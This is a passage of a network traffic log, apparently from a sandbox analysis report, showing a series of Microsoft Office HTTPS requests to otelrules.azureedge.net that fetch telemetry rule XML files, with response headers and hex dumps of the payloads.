2024-11-11 00:15:18 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49890	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:17 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:18 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:17 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 9314d3eb-501e-00a3-0555-2ec0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001517Z-17df447cdb56j5xmhC1DFWn91800000009w00000000019vy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:18 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49892	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:18 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:18 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:18 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: 71af9553-101e-00a2-14d2-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001518Z-16547b76f7fq9mcrhC1DFWq15w0000000d9000000000gyfc x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:18 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49893	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:18 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:18 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:18 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: cd4157ec-d01e-007a-3336-33f38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001518Z-17df447cdb57g7m7hC1DFW791s00000009r0000000006ped x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:18 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49894	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:18 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:18 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:18 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: 524abde6-c01e-007a-10d2-2cb877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001518Z-16547b76f7fj897nhC1DFWdwq40000000d90000000005wc9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:18 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49895	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:18 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:18 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:18 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: 31f85cd6-001e-0049-0b4a-325bd5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001518Z-16547b76f7f775p5hC1DFWzdvn0000000dc00000000096bp x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:18 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49896	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:18 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:18 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:18 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: 16d49bac-201e-00aa-7816-323928000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001518Z-16547b76f7fj897nhC1DFWdwq40000000d90000000005wcd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:18 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49897	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:19 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:19 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:19 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: 6faec6d6-f01e-001f-01af-315dc8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001519Z-15869dbbcc662ldwhC1DFWh4e000000003r000000000hbw5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:19 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49898	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:19 UTC	192	OUT	GET /rules/rule701350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:19 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:19 GMT Content-Type: text/xml Content-Length: 1370 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE62E0AB" x-ms-request-id: 43525779-601e-003e-2ed2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001519Z-16547b76f7f9rdn9hC1DFWfk7s0000000d8g00000000m7by x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:19 UTC	1370	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49899	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:19 UTC	192	OUT	GET /rules/rule702151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:19 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:19 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE156D2EE" x-ms-request-id: 11730d72-501e-000a-528e-300180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001519Z-17df447cdb56mx55hC1DFWvbt400000006p0000000004rxr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:19 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49900	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:19 UTC	192	OUT	GET /rules/rule702150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:19 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:19 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT ETag: "0x8DC582BEDC8193E" x-ms-request-id: 95e3a472-701e-0050-58d2-2c6767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001519Z-16547b76f7fnlcwwhC1DFWz6gw0000000ddg00000000h3yw x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:19 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	49901	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:19 UTC	192	OUT	GET /rules/rule703001v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:19 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:19 GMT Content-Type: text/xml Content-Length: 1406 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB16F27E" x-ms-request-id: e1fdd300-601e-0050-075b-322c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001519Z-15869dbbcc6kg5mvhC1DFW39vn00000003ug000000007tt0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:19 UTC	1406	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	49902	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
